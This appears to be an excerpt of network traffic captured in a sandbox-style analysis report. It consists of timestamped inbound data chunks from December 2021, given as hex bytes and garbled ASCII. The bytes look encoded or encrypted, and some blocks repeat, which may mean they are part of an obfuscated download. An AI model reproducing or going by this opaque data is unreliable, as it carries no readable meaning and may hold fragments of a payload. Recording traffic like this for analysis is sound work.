                                          2021-12-23 16:00:51 UTC180INData Raw: 0c 45 b8 31 e9 c2 60 1b 29 b7 ca 2b bc ab 42 8c 83 14 94 6e e2 a4 41 4f 4e 28 50 c9 24 91 0a 28 d9 79 cc 64 e8 0e e0 9c 5d 98 4a 17 3d ab 0f 8c 4f e1 80 4e 42 a4 e1 03 4e a8 4f c8 25 92 8a 28 0d 78 ec 45 e8 0e 5f 1b 29 b7 c9 4b 89 2a 43 0c 83 e1 34 6e 42 c4 41 83 6e 27 d0 a9 25 72 0a 48 0d 59 eb 31 b5 42 60 fc 29 38 4a 17 9d 2a 43 0c 4f 95 94 ee 2e a4 60 4f ee 08 50 c9 f1 92 0a 14 ed 45 cc 65 e9 41 5f e8 5d b8 4a 2b 3d ab 23 0c 4f e1 94 6d 61 a4 60 03 3a 08 4f 49 a5 92 09 48 8d 79 eb e5 e9 0e 40 fc 3d 84 ca 4b 3d 2b 42 0c 4f 14 34 6e 62 90 41 82 6d 28 1c a9 f1 72 0a 14 0c 79 6c e5 e8 22 40 1b 3d 84 ca 2b 3d ab 0f 0b 82 95 b3 6e 62 90 e1 03 ee 28 d0 c9 f1 72 0a 28 ed 78 b8 45 c9 42 60 fc 5d b8 ca 4a bd 2a c3 8c 83 14 94 4e 2e a4 60 63 6e f4 4f c8 a5 12 8a
                                          Data Ascii: E1`)+BnAON(P$(yd]J=ONBNO%(xE_)K*C4nBAn'%rHY1B`)8J*CO.`OPEeA_]J+=#Oma`:OIHy@=K=+BO4nbAm(ryl"@=+=nb(r(xEB`]J*N.`cnO
                                          2021-12-23 16:00:51 UTC185INData Raw: 42 2c 1b 3d 84 c9 17 bd f7 0f d8 82 e1 b3 6d 62 c4 61 82 ee 08 4f c8 a5 12 0a c8 d9 79 cc 64 e9 22 2c 9c 5d 38 c9 4b 9d ab 23 d8 82 14 34 3a 42 44 60 82 4e 08 d0 a9 a5 92 0a 28 0d 45 b8 64 69 41 40 9c dd 38 ca 17 bd f7 42 d8 03 f5 34 3a 2e a4 61 4f 3a 28 d0 c8 24 5e 0a 47 0c 45 b8 64 b5 22 40 fc dd b7 96 17 89 2a 0f 0b 63 95 80 ee 42 a4 60 83 6e f4 4f 49 a5 92 ea 14 0d 79 6c e5 b5 0e e0 fc 3d b8 c9 2b bc 2b 43 d8 63 f5 34 6d e2 90 60 4f ee 28 d0 c8 f1 91 09 28 0d 59 eb 65 b5 c2 60 1b dd 84 c9 17 89 0b 0f ec 03 15 94 ee e2 c4 61 83 3a 08 1c 49 f1 91 d6 14 d9 59 ec e5 c9 42 e0 1b 3d 38 c9 4a bd f7 42 8c 03 95 34 ee 42 c3 e1 03 6e 28 d0 c8 24 12 ea 28 d9 f9 6c 31 e9 42 60 fc dd 98 c9 cb 3d 0b 0f ec 82 95 34 ee 42 44 41 4f 4e a8 50 a9 25 5e 0a 47 0d 59 eb e5
                                          Data Ascii: B,=mbaOyd",]8K#4:BD`N(EdiA@8B4:.aO:($^GEd"@*cB`nOIyl=++Cc4m`O((Ye`a:IYB=8JB4Bn($(l1B`=4BDAONP%^GY
                                          2021-12-23 16:00:51 UTC189INData Raw: 38 ca cb 9d 0b 23 0b 63 15 34 6d 42 c3 e1 4f 4e a8 1c a9 a5 5e 8a 14 0d 59 cc 65 b5 c2 2c 1c dd b8 ca cb bd 2b 0f ec 03 f5 94 3a 61 c4 41 82 6e a8 1c 95 f1 72 d6 14 ed 45 b8 65 b5 22 60 1c 29 84 96 4a bd f7 0f 0b 03 e1 b3 4e 2e 44 e1 4f 6d f4 50 95 24 72 0a c8 ed f9 6c e5 e9 c2 5f 1c dd b7 c9 cb 9d 0b 42 8c 82 15 34 ee 42 c3 60 83 4e 28 1c a9 05 92 ea 47 0c 79 b8 64 c9 42 60 e8 dd b7 ca cb bd ab 43 8c 83 95 b4 6e 61 a4 60 03 ee 28 d0 95 f1 91 0a c8 ed f9 ec 31 c9 41 5f fc 3d 98 4a 2b 89 2b 42 0b 03 e1 b4 6e e2 c4 60 63 6d a8 30 c8 f1 5e 8a 48 d9 59 ec 45 c9 22 5f e8 5c b7 c9 4a 3d 2b 42 ec 82 e1 80 6d 42 a4 2d 83 6d f4 d0 c9 a5 12 0a 14 ed 59 eb 31 c9 42 2c 1b 5c 98 4a 4b 9d f7 0f 0c 83 14 94 3a e2 44 e1 03 ee 27 1c 49 05 12 09 48 8d 59 cc 65 e9 c2 2c 1c
                                          Data Ascii: 8#c4mBON^Ye,+:aAnrEe"`)JN.DOmP$rl_B4B`N(GydB`Cna`(1A_=J++Bn`cm0^HYE"_\J=+BmB-mY1B,\JK:D'IHYe,
                                          2021-12-23 16:00:51 UTC192INData Raw: 40 1c 3d 38 96 2b 3d 2a 42 0c 83 f5 80 6d 2e c4 60 03 4e 08 50 c8 24 72 0a 14 0d 79 6c 45 b5 c2 5f 1b 5c 38 4a 4a 9d 2a 23 8c 03 15 b4 ee 61 c3 41 82 ee 28 1c c9 f1 91 0a 48 d9 59 cc e5 e9 41 5f 9c 3d 38 c9 cb bd f7 42 ec 4f f5 b3 6d 42 c4 41 4f 6e 27 1c c8 a5 92 0a 48 0d 78 b8 65 b5 c2 60 e8 3d 98 4a cb bc 2a 00 43 ec 63 15 34 6d 62 90 e1 63 6d 08 30 c9 05 5e d6 47 0c f9 b8 64 b5 0e 60 e8 dd 84 96 2b bd ab 23 8c 4f 14 b4 3a 42 a4 41 03 4e 28 30 c9 a5 5e 8a 47 8d 79 eb e5 e8 c2 5f 1b 5c 98 96 cb 9d ab 43 8c 03 95 80 6d e2 44 61 82 6d 28 30 49 25 92 d6 c8 0c 45 ec 31 b5 22 60 1c dd 38 4a cb bc 0b 0f 0b 4f 95 94 ee 62 44 2d 4f 6e f4 4f c8 24 72 ea 47 0d f9 6c e5 b5 42 60 1c 5d b7 ca 4a 9d ab 23 8c 83 e1 80 4e 2e a4 61 4f 6d f4 30 49 05 91 8a 47 d9 f9 6c 65
                                          Data Ascii: @=8+=*Bm.`NP$rylE_\8JJ*#aA(HYA_=8BOmBAOn'Hxe`=J*Cc4mbcm0^Gd`+#O:BAN(0^Gy_\CmDam(0I%E1"`8JObD-OnO$rGlB`]J#N.aOm0IGle
                                          2021-12-23 16:00:51 UTC196INData Raw: 4a cb bd 2b 42 0b 4f e1 80 ee 42 90 e1 4f 4e a8 1c 95 f1 91 d6 47 8d 79 eb 65 69 0e 60 fc 5d 38 ca 17 89 ab 23 ec 83 15 80 6d 2e c4 61 83 6e 28 4f c8 24 12 09 c8 0c 45 b8 64 b5 c2 5f 9c 5d 98 96 cb 9d 2a 0f ec 63 15 b3 ee 61 c4 61 82 6e 27 30 c9 05 72 09 47 d9 79 eb 64 c9 0e 2c e8 5c 38 ca 4b bc ab 0f d8 82 f5 80 3a 42 c4 41 03 4e f4 4f 49 a5 72 ea 47 d9 78 cc 64 69 0e 2c 1b dd 38 c9 2b 89 ab 43 d8 03 f5 b4 ee 62 44 e1 83 6d a8 50 49 25 92 8a 48 d9 79 b8 e5 c9 42 e0 1b dd 84 aa 4a 3d 0b 23 0c 63 95 34 6e e2 a4 61 4f 4e f4 30 c8 24 12 d6 48 0c f9 cc e5 69 c2 60 9c dd 84 ca 4b 3d 2b 0f 0c 83 15 94 6d 61 90 61 83 3a 27 1c a9 24 92 8a c8 ed 79 6c 31 e9 42 2c 1b 3d 84 4a 2b bc ab 42 0c 03 14 b4 4e 2e c3 60 4f ee 27 30 49 24 72 8a c8 d9 45 b8 45 e9 42 2c 1b 5d
                                          Data Ascii: J+BOBONGyei`]8#m.an(O$Ed_]*caan'0rGyd,\8K:BANOIrGxdi,8+CbDmPI%HyBJ=#c4naON0$Hi`K=+maa:'$yl1B,=J+BN.`O'0I$rEEB,]
                                          2021-12-23 16:00:51 UTC200INData Raw: 43 0c 83 e1 34 6e 42 c4 41 83 6e 27 d0 a9 25 72 0a 48 0d 59 eb 31 b5 42 60 fc 29 38 4a 17 9d 2a 43 0c 4f 95 94 ee 2e a4 60 4f ee 08 50 c9 f1 92 0a 14 ed 45 cc 65 e9 41 5f e8 5d b8 4a 2b 3d ab 23 0c 4f e1 94 6d 61 a4 60 03 3a 08 4f 49 a5 92 09 48 8d 79 eb e5 e9 0e 40 fc 3d 84 ca 4b 3d 2b 42 0c 4f 14 34 6e 62 90 41 82 6d 28 1c a9 f1 72 0a 14 0c 79 6c e5 e8 22 40 1b 3d 84 ca 2b 3d ab 0f 0b 82 95 b3 6e 62 90 e1 03 ee 28 d0 c9 f1 72 0a 28 ed 78 b8 45 c9 42 60 fc 5d b8 ca 4a bd 2a c3 8c 83 14 94 4e 2e a4 60 63 6e f4 4f c8 a5 12 8a c8 d9 45 eb 31 e9 22 5f 1c 29 84 96 2b 9d ab 23 8c 83 14 94 4e 61 a4 e1 82 4e 08 d0 c8 a5 12 d6 c8 0c 59 6c 64 c9 c2 40 9c dd 84 aa cb 3d 0b c3 ec 63 14 b3 6d 2e c4 e1 4f 6e 08 30 95 24 92 8a c8 0d f9 b8 e5 b5 41 40 1b 29 b7 96 17 3d
                                          Data Ascii: C4nBAn'%rHY1B`)8J*CO.`OPEeA_]J+=#Oma`:OIHy@=K=+BO4nbAm(ryl"@=+=nb(r(xEB`]J*N.`cnOE1"_)+#NaNYld@=cm.On0$A@)=
                                          2021-12-23 16:00:51 UTC204INData Raw: 34 3a 2e a4 61 4f 3a 28 d0 c8 24 5e 0a 47 0c 45 b8 64 b5 22 40 fc dd b7 96 17 89 2a 0f 0b 63 95 80 ee 42 a4 60 83 6e f4 4f 49 a5 92 ea 14 0d 79 6c e5 b5 0e e0 fc 3d b8 c9 2b bc 2b 43 d8 63 f5 34 6d e2 90 60 4f ee 28 d0 c8 f1 91 09 28 0d 59 eb 65 b5 c2 60 1b dd 84 c9 17 89 0b 0f ec 03 15 94 ee e2 c4 61 83 3a 08 1c 49 f1 91 d6 14 d9 59 ec e5 c9 42 e0 1b 3d 38 c9 4a bd f7 42 8c 03 95 34 ee 42 c3 e1 03 6e 28 d0 c8 24 12 ea 28 d9 f9 6c 31 e9 42 60 fc dd 98 c9 cb 3d 0b 0f ec 82 95 34 ee 42 44 41 4f 4e a8 50 a9 25 5e 0a 47 0d 59 eb e5 e8 22 2c 1c 29 38 4a 4b bc 0b 0f 0c 83 15 b3 6d 2e 90 e1 82 3a f4 4f 95 05 92 09 28 ed 45 ec 45 e8 41 5f 1b 3d b8 ca 2b 89 ab 23 0b 63 95 94 6e 2e c4 60 4f 6e 28 50 c8 25 5e d6 14 ed 45 ec e5 e8 42 60 9c 5c 98 4a 4a bc 2a c3 8c 83
                                          Data Ascii: 4:.aO:($^GEd"@*cB`nOIyl=++Cc4m`O((Ye`a:IYB=8JB4Bn($(l1B`=4BDAONP%^GY",)8JKm.:O(EEA_=+#cn.`On(P%^EB`\JJ*
                                          2021-12-23 16:00:51 UTC208INData Raw: 4f 6d f4 50 95 24 72 0a c8 ed f9 6c e5 e9 c2 5f 1c dd b7 c9 cb 9d 0b 42 8c 82 15 34 ee 42 c3 60 83 4e 28 1c a9 05 92 ea 47 0c 79 b8 64 c9 42 60 e8 dd b7 ca cb bd ab 43 8c 83 95 b4 6e 61 a4 60 03 ee 28 d0 95 f1 91 0a c8 ed f9 ec 31 c9 41 5f fc 3d 98 4a 2b 89 2b 42 0b 03 e1 b4 6e e2 c4 60 63 6d a8 30 c8 f1 5e 8a 48 d9 59 ec 45 c9 22 5f e8 5c b7 c9 4a 3d 2b 42 ec 82 e1 80 6d 42 a4 2d 83 6d f4 d0 c9 a5 12 0a 14 ed 59 eb 31 c9 42 2c 1b 5c 98 4a 4b 9d f7 0f 0c 83 14 94 3a e2 44 e1 03 ee 27 1c 49 05 12 09 48 8d 59 cc 65 e9 c2 2c 1c 3d 84 4a 17 bd ab 42 0c 4f e1 34 6e 61 90 e1 82 ee f4 4f c9 24 5e 8a 28 ed 78 ec 45 e8 42 2c 1c 29 84 aa cb 89 0b 0f 0c 03 95 b3 ee 61 c4 60 4f 6e a8 4f c9 a5 12 d6 c8 d9 45 eb 65 69 0e 40 1c dd 84 ca 2b 9d 2b 42 d8 82 e1 b3 ee 2e a4
                                          Data Ascii: OmP$rl_B4B`N(GydB`Cna`(1A_=J++Bn`cm0^HYE"_\J=+BmB-mY1B,\JK:D'IHYe,=JBO4naO$^(xEB,)a`OnOEei@++B.
                                          2021-12-23 16:00:51 UTC212INData Raw: 05 92 8a 47 8d 59 b8 65 e9 c2 5f fc 29 38 96 4a bc 2a 23 0b 83 f5 b4 6e 2e 90 2d 82 ee a8 50 c9 25 72 d6 47 ed 79 b8 e5 c9 42 5f e8 5d 38 ca 2b bd f7 42 ec 82 f5 b4 4e 61 c3 2d 82 4e f4 30 a9 a5 5e d6 48 8d 78 cc 45 e9 0e e0 1b 3d 98 96 cb 89 ab 23 ec 82 14 34 6d 2e a4 41 4f 3a f4 1c a9 f1 91 8a 47 0c f9 ec e5 c9 41 60 1b 3d 84 96 cb bc 2b 42 ec 63 95 b4 3a 2e a4 2d 63 ee f4 d0 c9 24 12 0a 14 ed 45 6c 65 c9 41 5f e8 5c 98 96 17 bc ab 0f ec 83 f5 80 6d 62 a4 e1 03 4e 27 4f c8 f1 72 0a 48 0d 45 6c 45 b5 41 e0 e8 3d b8 96 2b 3d 0b 23 0c 83 f5 b4 6e 42 c3 61 83 6e 28 1c c9 05 12 0a c8 ed 79 cc 31 e8 0e 5f e8 dd 38 4a 2b 3d ab 0f 8c 63 e1 b4 6e 62 c3 2d 82 3a f4 d0 c8 24 72 ea 28 0d 79 b8 45 b5 0e e0 9c 3d 98 c9 cb bd ab 23 ec 4f 14 b4 3a 42 44 2d 03 6e 27 1c
                                          Data Ascii: GYe_)8J*#n.-P%rGyB_]8+BNa-N0^HxE=#4m.AO:GA`=+Bc:.-c$EleA_\mbN'OrHElEA=+=#nBan(y1_8J+=cnb-:$r(yE=#O:BD-n'
                                          2021-12-23 16:00:51 UTC224INData Raw: 59 eb 65 b5 c2 60 1b dd 84 c9 17 89 0b 0f ec 03 15 94 ee e2 c4 61 83 3a 08 1c 49 f1 91 d6 14 d9 59 ec e5 c9 42 e0 1b 3d 38 c9 4a bd f7 42 8c 03 95 34 ee 42 c3 e1 03 6e 28 d0 c8 24 12 ea 28 d9 f9 6c 31 e9 42 60 fc dd 98 c9 cb 3d 0b 0f ec 82 95 34 ee 42 44 41 4f 4e a8 50 a9 25 5e 0a 47 0d 59 eb e5 e8 22 2c 1c 29 38 4a 4b bc 0b 0f 0c 83 15 b3 6d 2e 90 e1 82 3a f4 4f 95 05 92 09 28 ed 45 ec 45 e8 41 5f 1b 3d b8 ca 2b 89 ab 23 0b 63 95 94 6e 2e c4 60 4f 6e 28 50 c8 25 5e d6 14 ed 45 ec e5 e8 42 60 9c 5c 98 4a 4a bc 2a c3 8c 83 f5 94 6e 62 a4 e1 82 6e 08 4f 49 a5 5e 0a 47 0c 79 6c e5 c9 41 2c fc 3d b7 aa 2b 9d f7 43 0c 83 f5 80 6e 42 90 61 03 6d a8 4f 49 24 91 0a 14 8d 45 b8 64 b5 22 40 1c dd 38 c9 2b 9d f7 42 8c 03 f5 b4 4e e2 c3 2d 03 6e 08 50 c9 a5 92 d6 14
                                          Data Ascii: Ye`a:IYB=8JB4Bn($(l1B`=4BDAONP%^GY",)8JKm.:O(EEA_=+#cn.`On(P%^EB`\JJ*nbnOI^GylA,=+CnBamOI$Ed"@8+BN-nP
                                          2021-12-23 16:00:51 UTC240INData Raw: 14 ed f9 6c 64 e9 22 e0 1b 3d 38 c9 4a bc 2b 43 d8 82 f5 b4 6e 42 90 2d 82 3a 08 50 c8 24 91 ea c8 0d 45 eb 65 c9 c2 60 1b 3d b8 4a 4a bc 2b 43 8c 4f e1 34 4e 2e 90 41 83 6e f4 50 a9 25 91 8a c8 0d 79 eb e5 b5 22 2c 1b 3d b7 4a 4a 3d 2a c3 0b 83 14 b3 3a 2e c4 61 83 6d a8 50 c8 25 12 ea 14 8d 59 ec 65 e8 0e 5f 9c 5d 84 ca 4a 9d 2b 23 8c 4f f5 b3 3a 2e 90 2d 82 3a 28 50 c9 f1 92 d6 48 ed 78 eb 45 c9 0e e0 9c 5d 98 96 2b 3d ab 42 d8 4f 95 94 4e 2e 90 2d 4f 6d f4 4f 49 24 91 0a 47 0c 78 6c e5 69 41 2c 9c 5d b7 ca 4a 89 0b 43 0b 03 95 94 6d e2 44 e1 63 6d 28 50 c8 f1 92 8a 14 d9 45 ec 31 b5 41 60 e8 3d 84 c9 cb bd 0b 42 0b 83 e1 94 6e 61 44 2d 03 6e 27 1c c9 24 72 ea 28 8d 78 6c 45 e9 c2 60 e8 dd b8 ca 17 bc 0b 0f ec 03 14 b3 3a 62 90 61 03 6d 08 30 a9 24 92
                                          Data Ascii: ld"=8J+CnB-:P$Ee`=JJ+CO4N.AnP%y",=JJ=*:.amP%Ye_]J+#O:.-:(PHxE]+=BON.-OmOI$GxliA,]JCmDcm(PE1A`=BnaD-n'$r(xlE`:bam0$
                                          2021-12-23 16:00:51 UTC256INData Raw: 5e 8a 47 0c 59 eb 65 c9 41 5f e8 dd 98 96 4a bc 0b 42 0b 4f e1 b4 3a e2 a4 61 82 3a f4 50 c9 25 92 09 47 ed 59 cc e5 b5 22 60 fc 5c 84 c9 4a bc 0b c3 0c 03 14 34 4e 2e 44 61 83 3a a8 50 a9 05 72 8a 28 0c 78 ec 45 b5 22 40 fc 3d b7 4a 2b 3d 2a 43 ec 82 f5 80 3a 42 90 41 63 6e a8 50 c9 a5 92 0a 14 8d 59 6c e5 e9 41 40 1c 29 38 ca 4a 3d 2b 23 d8 82 14 80 6e 61 c3 60 03 6e 27 30 c8 05 5e 0a c8 0c 78 6c 65 69 42 60 1b 3d 38 c9 4a bd 2a 42 0c 03 95 b3 6d 62 a4 61 82 6e 08 30 49 24 92 8a 28 0c 45 ec 45 e8 c2 5f 1c dd b7 c9 cb bd 0b 23 d8 82 14 b3 6d 61 c3 2d 03 3a 27 4f c9 a5 91 0a 47 ed 79 cc 45 69 c2 60 fc 3d 84 ca 4a bc 0b c3 0c 82 15 b4 3a e2 c4 61 82 6e 27 50 c8 24 91 0a 48 0d 78 cc 64 e9 41 2c e8 5d 38 ca 4a bd f7 0f 0c 4f 15 b4 4e 2e 90 2d 4f 3a 08 50 c8
                                          Data Ascii: ^GYeA_JBO:a:P%GY"`\J4N.Da:Pr(xE"@=J+=*C:BAcnPYlA@)8J=+#na`n'0^xleiB`=8J*Bmban0I$(EE_#ma-:'OGyEi`=J:an'P$HxdA,]8JON.-O:P
                                          2021-12-23 16:00:51 UTC272INData Raw: c8 25 5e d6 47 0d 45 6c 65 c9 0e 2c fc 5d 38 96 4a 3d 0b 23 ec 82 15 94 6d 62 c4 41 83 3a 27 30 a9 f1 91 09 28 d9 78 6c e5 69 0e 5f 1c dd b8 aa 4a 3d 0b 23 8c 4f 15 b3 ee e2 90 41 82 6e 08 d0 c8 24 91 d6 14 ed f9 b8 65 e9 22 40 1b 29 38 ca 4b bc 2b c3 ec 83 95 b3 6d 42 a4 61 83 4e f4 d0 a9 f1 91 ea 28 8d 59 cc 31 e8 0e 60 1c 3d 98 4a 4a 3d ab 43 0b 03 95 34 3a 42 c3 61 4f 6d 08 30 49 25 72 d6 47 ed f9 eb 64 c9 22 40 1b 5c 84 96 2b 89 2b 42 0b 03 14 b4 3a 62 44 60 63 6d 08 1c a9 05 91 ea 47 8d f9 b8 64 e9 c2 5f 1c 5d b8 c9 cb 3d 2a 43 0c 63 f5 80 6e 61 c4 2d 83 ee 28 50 c8 05 92 0a c8 d9 79 cc 64 e8 41 5f 1b 29 38 4a 4a bd ab 23 ec 83 14 80 4e 62 c3 60 82 4e 08 4f c8 24 5e d6 c8 d9 45 6c 45 e8 42 2c e8 29 b8 ca 4a 9d 2a 42 d8 82 e1 80 ee 42 c4 61 83 4e 27
                                          Data Ascii: %^GEle,]8J=#mbA:'0(xli_J=#OAn$e"@)8K+mBaN(Y1`=JJ=C4:BaOm0I%rGd"@\++B:bD`cmGd_]=*Ccna-(PydA_)8JJ#Nb`NO$^ElEB,)J*BBaN'
                                          2021-12-23 16:00:51 UTC288INData Raw: 28 d0 c8 25 91 d6 14 ed f9 cc 64 69 0e 5f e8 5c b8 4a 4a bc 0b 23 0b 4f 14 80 ee 61 a4 41 03 6d 27 1c c8 05 12 0a c8 d9 f9 cc 31 c9 0e 60 9c 3d 98 4a 4a 3d f7 23 d8 63 95 34 3a 61 44 e1 83 3a 27 1c a9 05 12 8a 28 0d f9 eb 31 e8 0e 2c fc 3d b8 aa 4a 89 ab 43 8c 63 95 94 3a 2e 90 2d 03 4e 28 1c 95 05 91 8a 28 d9 45 ec e5 c9 c2 5f 1c 3d 98 aa 4a 89 2a 43 ec 03 f5 b4 6d 2e 44 60 83 ee 08 30 a9 a5 5e ea c8 ed 79 eb 31 c9 42 40 9c 5c b7 c9 4b 89 0b 0f 0b 63 95 b4 ee e2 90 e1 82 4e 28 50 49 25 72 0a 48 d9 59 eb 65 c9 0e 2c 1c 3d 98 c9 2b 3d 2a 43 0b 63 14 94 6d 2e c3 2d 83 3a 28 50 c9 25 91 8a 14 ed 78 ec 31 69 42 5f fc 29 98 4a 2b bc f7 43 0b 83 95 94 6e 42 a4 61 83 4e a8 1c a9 a5 91 8a 28 ed 78 6c 45 e8 0e 5f 1b 5d b7 4a 4a 3d f7 0f d8 03 e1 80 6d e2 90 60 4f
                                          Data Ascii: (%di_\JJ#OaAm'1`=JJ=#c4:aD:'(1,=JCc:.-N((E_=J*Cm.D`0^y1B@\KcN(PI%rHYe,=+=*Ccm.-:(P%x1iB_)J+CnBaN(xlE_]JJ=m`O
                                          2021-12-23 16:00:51 UTC304INData Raw: 6e f4 1c a9 05 5e 09 14 8d 78 ec e5 e8 41 5f e8 5c b7 ca 4a bc 2b 0f ec 83 15 b4 6d e2 c3 2d 82 ee 08 d0 95 24 91 8a 47 0c f9 cc 64 b5 22 e0 00 fc 5c b7 4a 4b 9d 2b 0f 8c 03 14 b4 6e 42 a4 60 82 6d a8 30 c9 a5 92 09 28 d9 59 cc 65 c9 22 2c fc 3d 84 96 4b 89 2b 43 0c 83 95 b4 4e 42 c4 60 63 4e 28 d0 49 f1 5e d6 14 0c 79 ec 64 b5 c2 5f 1b 5d 84 c9 4b 9d 2a 23 0b 4f e1 80 ee 2e a4 2d 83 ee 28 1c c9 25 12 09 48 0d 78 eb 65 69 0e 40 1c 29 b7 4a 2b bc 2a c3 ec 63 95 34 6d 42 c3 61 03 4e f4 4f 95 a5 5e ea c8 ed 45 6c 45 e8 42 60 9c 3d 38 aa 2b 3d f7 43 0c 63 95 b4 6e 2e c4 60 4f ee f4 1c c8 a5 12 0a 48 8d 45 cc 45 e8 0e 5f 9c 29 98 aa 17 bc 2b c3 0c 03 f5 b4 6d 42 90 2d 03 6e 28 30 a9 25 72 ea 14 0d 78 ec 31 c9 c2 60 e8 3d 98 4a cb 89 0b 43 d8 83 f5 94 6d 62 44
                                          Data Ascii: n^xA_\J+m-$Gd"\JK+nB`m0(Ye",=K+CNB`cN(I^yd_]K*#O.-(%Hxei@)J+*c4mBaNO^ElEB`=8+=Ccn.`OHEE_)+mB-n(0%rx1`=JCmbD
                                          2021-12-23 16:00:51 UTC320INData Raw: c3 60 03 3a 27 1c c8 a5 12 09 28 0c 59 cc 45 69 0e 2c 1b 5d 38 aa cb bc ab c3 ec 4f 15 80 ee 61 c4 41 4f 6e 08 4f 95 25 72 d6 47 ed f9 b8 31 b5 0e 2c e8 dd 38 96 4b 89 2b 23 8c 03 e1 80 6d 2e 90 e1 82 3a 08 4f 95 05 5e 09 47 8d 59 6c 45 e8 22 60 1b 5c b8 96 2b 3d 2b 23 ec 03 14 80 6e 61 44 61 83 6d f4 4f 49 a5 72 d6 48 0c 78 cc e5 c9 42 5f 1c 29 b7 c9 4b bd f7 42 8c 4f 95 94 6e e2 44 41 4f 4e a8 4f 49 05 5e d6 14 d9 78 b8 64 e8 22 60 e8 dd 98 c9 4b 9d f7 23 8c 63 95 34 4e 61 44 60 82 6e 08 30 95 25 5e ea 48 0c 79 b8 e5 e8 42 5f 1c 5d 84 c9 cb 3d 2a 43 8c 83 14 94 ee 42 a4 61 03 4e f4 d0 95 25 12 8a 47 0c f9 cc 31 69 0e e0 e8 3d b8 4a 2b 3d 0b 42 0c 63 f5 34 6e 42 a4 2d 83 4e 08 50 a9 25 5e ea 28 d9 45 cc 31 c9 0e 5f 9c 5d b7 4a 17 bd f7 43 ec 82 14 b3 6e
                                          Data Ascii: `:'(YEi,]8OaAOnO%rG1,8K+#m.:O^GYlE"`\+=+#naDamOIrHxB_)KBOnDAONOI^xd"`K#c4NaD`n0%^HyB_]=*CBaN%G1i=J+=Bc4nB-NP%^(E1_]JCn
                                          2021-12-23 16:00:51 UTC336INData Raw: 82 f4 f3 73 9d 21 81 a1 b5 c0 c8 cb bf ec 3f 84 2a d6 a1 5c 9f c5 0d a6 c0 85 89 c7 7e dd ca d6 c2 e4 2e de de 71 9d cd bf 84 6d 70 31 a4 3f 0d 8e c4 c7 c2 ae 31 0d 7d b1 08 eb b8 83 79 17 07 98 25 bb ce 54 db 79 b9 9d 9f d8 1b bf ec 3f 88 2a f2 a4 5c 9f cf 99 da 74 e0 2a 80 76 f5 34 b8 b2 34 30 32 75 05 61 89 f7 df c8 56 2a 2d 8f a4 56 45 68 01 44 41 51 da fd 44 61 a7 dc 04 a0 b8 89 25 b3 32 66 68 62 1f 29 b5 09 e3 1a 5a f8 80 42 23 83 6c ef cf 99 da 78 e0 46 84 76 f5 3e 44 e6 e8 8b 8a 2e fd 79 3c da cf 18 58 7e c4 23 68 c9 7d c3 5c 2a 3a da 2a 94 0c e2 48 1b 9a b0 fc e6 71 ef 0a 55 63 88 a8 da a6 09 db 01 1d 3e b5 a8 af 99 9d b7 2a be 93 70 f8 c0 63 86 45 3e 44 e6 ec 8b a6 31 fd 79 46 66 03 cc b3 8d 7d 1b 80 c5 60 b3 ac 2c 8e 71 be 58 36 1a a3 76 80 a9
                                          Data Ascii: s!?*\~.qmp1?1}y%Ty?*\t*v4402uaV*-VEhDAQDa%2fhb)ZB#lxFv>D.y<X~#h}\*:*HqUc>*pcE>D1yFf}`,qX6v
                                          2021-12-23 16:00:51 UTC351INData Raw: 79 23 1a de 7c ef 7a a1 1b 80 cf 2c e7 18 9f 42 4d 9e 2f 90 3d a3 01 c0 99 18 4d e4 a3 73 9d 21 e9 a1 89 76 c8 cb ec 9f 1a 7f c1 2b 4f 80 53 42 4d b6 58 02 d1 a3 76 80 79 e0 31 c5 a3 e6 de 91 9d e9 1b df c8 54 34 2d 1d ea 46 f0 50 a8 c3 4a 35 d6 10 f8 3d 2e 12 19 65 f8 c2 e4 2e b1 0b fc 78 b8 99 c7 a1 5e 32 a0 6b d3 cf ec e7 64 87 44 ed b6 70 85 c9 c7 c2 f6 b1 f8 aa 52 44 e6 51 8a 05 dd 56 e0 c8 cb 1a 52 a5 80 42 2d 4f 80 d3 43 4d b6 58 9e c7 a3 76 82 3d 1c 76 e4 a3 e6 39 97 03 b9 1a 6c 14 ef 46 88 5c 21 42 a0 50 e8 c3 0e 4d b6 70 e0 fa 1d 76 f5 3e 84 e6 a0 a3 e6 51 e5 f2 43 1a df b1 c3 2b 9f 1a 7f b6 c4 ff c6 9f 41 c2 b6 fd 44 61 d3 5e df ac f8 c2 71 5f 0a ad fe 79 b9 82 99 e6 4a 55 f7 a8 cc 66 cc ab b4 9f 43 4d 43 f4 1c dd a3 76 f5 b0 ac e6 40 a4 e6 51
                                          Data Ascii: y#|z,BM/=Ms!v+OSBMXvy1T4-FPJ5=.e.x^2kdDpRDQVRB-OCMXv=v9lF\!BPMpv>QC+ADa^q_yJUfCMCv@Q
                                          2021-12-23 16:00:51 UTC367INData Raw: a4 5d 79 b9 a5 d7 55 7f 56 2c 1b 80 42 45 68 01 44 41 51 da fd 44 61 a7 dc 04 a0 b8 4f 65 2b e6 51 fd 40 b9 c1 41 dd 34 98 af f1 c0 4a 88 f8 bc 9f 42 d0 76 80 48 ca ef 9a fd 99 7c 25 e4 a3 73 9d 21 7d a1 39 3f c8 cb b5 60 0b d0 cf ec e7 64 87 44 ad b6 70 83 35 30 2a 19 3d f8 c2 e4 48 8b f6 a2 78 bd 3e 62 8c bf 25 af 99 04 66 5c c4 5c 9f cf e1 da 48 f8 3d a3 01 c2 3e 3c e6 f0 09 f5 27 01 9d 42 5e 03 d0 b3 3d c5 1b 80 ac a0 50 a8 c3 4a 35 76 cf f8 3d 96 85 73 f1 00 28 f3 79 2a 75 59 e3 c9 a7 2b ec d3 1a 4a 7a 80 42 93 d2 da df 4a b3 c5 46 7c 61 27 76 f5 b1 62 e2 71 ef 0a 59 e5 0a 18 1a df 53 bb bd e6 23 0b b8 ac 4c e0 c3 d6 4e b6 70 81 f1 c7 1e f6 b1 f8 2c e4 30 72 75 ad 79 b9 1a c7 fd 2b 32 a0 85 80 cf 2c e7 fc 9f 42 4d 9e 97 58 3d a3 03 a9 d5 d4 c3 e4 a3
                                          Data Ascii: ]yUV,BEhDAQDaOe+Q@A4JBvH|%s!}9?`dDp50*=Hx>b%f\\H=><'B^=PJ5v=s(y*uY+JzBJF|a'vbqYS#LNp,0ruy+2,BMX=
